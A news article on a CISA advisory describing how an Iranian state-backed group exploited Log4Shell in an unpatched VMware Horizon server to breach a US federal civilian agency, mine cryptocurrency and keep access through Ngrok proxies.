In December last year, it was reported that Iranian and Chinese hackers were exploiting the Log4Shell vulnerability in the wild. Now, according to the US CISA (Cyber security infrastructure and security Agency), an advanced persistent threat (APT) group sponsored by the Iranian government compromised the network of a U.S. federal agency.
The attack, according to authorities, was launched on the Federal Civilian Executive Branch (FCEB).
CISA revealed that the hackers used the Log4Shell vulnerability, tracked as CVE-2021-44228, in the unpatched VMware Horizon server to compromise the network and gain control of the organization’s domain controller (DC). Once they successfully invaded the system, the hackers deployed XMRig crypto mining software to steal credentials and mine for crypto.
For your information, Log4Shell is a zero-day vulnerability in a Java logging framework called Log4j that causes arbitrary code execution and impacts VMware Horizon and an extensive array of products.
As per CISA, their researchers conducted a routine investigation in April 2022 and identified suspicious APT activities on the FCEB network using the EINSTEIN intrusion detection system used by the agency.
They discovered bi-directional traffic passing through the network and an already found malicious I.P. address linked with Log4Shell vulnerability exploitation in VMware Horizon servers.
CISA further noted that an HTTPS activity was launched from I.P. address 51.89.18164 to VMware’s server. Further probe revealed that the I.P. address was associated with Lightweight Directory Access Protocol (LDAP) server operated by attackers to deploy Log4Shell.
Who are the Attackers?
In a joint advisory from CISA, the Department of Homeland Security, and the FBI, it was revealed that the attack was launched in February 2022. The attackers moved laterally to DC, stole credentials, and implanted Ngrok reverse proxies on multiple hosts to retain persistence. U.S. security officials responded in June to clean the network.
Reportedly, the hackers were identified as Nemesis Kitten, and they launched the attack with backing from the Iranian government. Nemesis Kitten is an extension of the Phosphorus Iranian malware group, and they regularly utilize well-known, highly exploitable vulnerabilities to facilitate ransomware attacks against organizations.
CISA warned that organizations still using the unpatched server versions should be concerned as they would eventually be compromised.